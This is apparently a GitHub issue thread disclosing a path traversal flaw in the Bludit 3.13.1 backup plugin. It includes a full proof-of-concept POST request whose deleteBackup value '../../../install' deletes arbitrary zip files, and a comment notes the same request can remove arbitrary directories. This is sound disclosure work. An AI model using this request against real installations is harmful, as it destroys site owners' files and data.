### ISSUE TITLE
Arbitrary zip file deletion vulnerability in backup plugin

### ISSUE THREAD

**Issue by zongdeiqianxing** [bludit/bludit#1246]
bludit v3.13.1 has a arbitrary zip file deletion vulnerability in backup plugin . 

1 put a 'install.zip' in root directory
![image](https://user-images.githubusercontent.com/34082644/88990111-c289c380-d30f-11ea-9d3e-ef196a0dde41.png)

2 replace cookie and tokenCSRF and repeat the post data .  
```
POST /admin/configure-plugin/pluginBackup HTTP/1.1
Host: 10.150.10.170
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
Connection: close
Referer: http://10.150.10.170/admin/configure-plugin/pluginBackup
Cookie: FreeCMS_loginName=admin; BLUDIT-KEY=bo3bijk7meenma4eg7r4qjnrr4
Upgrade-Insecure-Requests: 1

tokenCSRF=82d75f6e2e987037d9d31814c235966de4c41e3e&backupFile=&deleteBackup=../../../install
```

3 can see the install.zip had deleted .
![image](https://user-images.githubusercontent.com/34082644/88990318-40e66580-d310-11ea-9318-3812f1021d1e.png)

**Comment by clickwork-git** [comment]
Can you please explain the issue.

**Comment by zongdeiqianxing** [comment]
![image](https://user-images.githubusercontent.com/34082644/89112784-b120f280-d49a-11ea-9f8f-79a6472e8dae.png)
File path is not filtered when deleting backup files in backup plugin .

**Comment by clickwork-git** [comment]
Sorry, you still haven't explained the issue. Please look how the script works.

**Comment by zongdeiqianxing** [comment]
it just is a post data . you also can use hackbar plugin in firefox to send post data 'tokenCSRF=82d75f6e2e987037d9d31814c235966de4c41e3e&backupFile=&deleteBackup=../../../install' , and you can replace deleteBackup‘s value to delete other zip files .

**Comment by anaggh** [comment]
Just looked into it. If php zip extension is enabled, you can delete arbitrary zips, otherwise you can delete arbitrary directories with this exploit.

So, if your bludit admin access is compromised, hacker can remove non bludit folders owned by the web server i.e other web directories/apps as well.

**Comment by dignajar** [comment]
Hello, with the new version of Bludit v4.0 rc1, I would like to close the old Github issues. If you feel that your issue is not resolved in the latest version, create a new ticket.

- Help and Support use the Forum https://forum.bludit.org
- Bugs and new requests here in Github https://github.com/bludit/bludit/issues
